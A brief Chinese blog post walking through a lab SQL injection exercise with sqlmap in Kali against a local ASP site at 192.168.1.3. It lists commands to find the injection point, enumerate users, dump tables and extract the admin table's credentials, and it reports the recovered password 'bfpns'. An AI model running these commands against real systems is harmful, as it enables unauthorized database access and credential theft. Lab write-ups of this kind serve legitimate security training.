Sqlmap數(shù)據(jù)庫注入攻擊

(利用sqlmap命令破解出access數(shù)據(jù)中的admin的密碼bfpns)

在kali中打開終端,在終端中輸入命令“sqlmap –u http://192.168.1.3:8008/onews.asp?id=45”(實驗的id),參數(shù)-u掃描注入點掃描目標(biāo)主機,檢測出的信息準(zhǔn)確。

“sqlmap –u http://192.168.1.3:8008/onews.asp?id=45 --users”獲取到用戶名

“sqlmap –u http://192.168.1.3:8008/onews.asp?id=45 -–dump –tables”探測數(shù)據(jù)庫和表信息

顯示探測出來的字段信息
針對admin表探測出的結(jié)構(gòu)

” sqlmap -u "http://192.168.1.3:8008/onews.asp?id=45" --dump -T admin -C admin,password”,進行暴庫,獲得用戶名和密碼

已經(jīng)猜解出來用戶名為admin
已經(jīng)猜解出來密碼為bfpns
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容